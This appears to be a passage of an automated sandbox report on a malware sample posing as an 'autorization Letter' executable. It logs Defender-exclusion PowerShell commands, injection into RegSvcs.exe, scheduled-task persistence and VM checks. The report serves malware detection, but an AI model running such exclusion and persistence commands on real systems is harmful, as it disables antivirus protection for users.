                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99875
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99640
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99519
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99391
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99266
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99156
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99047
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98937
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98814
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98688
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98563
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98453
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98344
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98219
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98109
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97999
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97891
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97781
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97672
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97562
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97453
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97344
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97219
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 100000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99859
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99638
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99531
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99421
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99312
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99203
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99093
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98983
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98875
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98765
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98655
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98547
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98437
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98328
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98219
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98094
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97984
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97863
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477
                      Source: RegSvcs.exe, 00000009.00000002.2211048894.0000000005BA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{r
                      Source: RegSvcs.exe, 0000000E.00000002.3353008996.0000000005AE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: autorization Letter.exe, 00000001.00000002.2157399976.0000000001703000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}g.T
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\autorization Letter.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe"
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tIFjYTCo.exe"
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe"
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tIFjYTCo.exe"
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 87A008
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe"
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tIFjYTCo.exe"
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp"
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmp1162.tmp"
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Queries volume information: C:\Users\user\Desktop\autorization Letter.exe VolumeInformation
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\autorization Letter.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Queries volume information: C:\Users\user\AppData\Roaming\tIFjYTCo.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
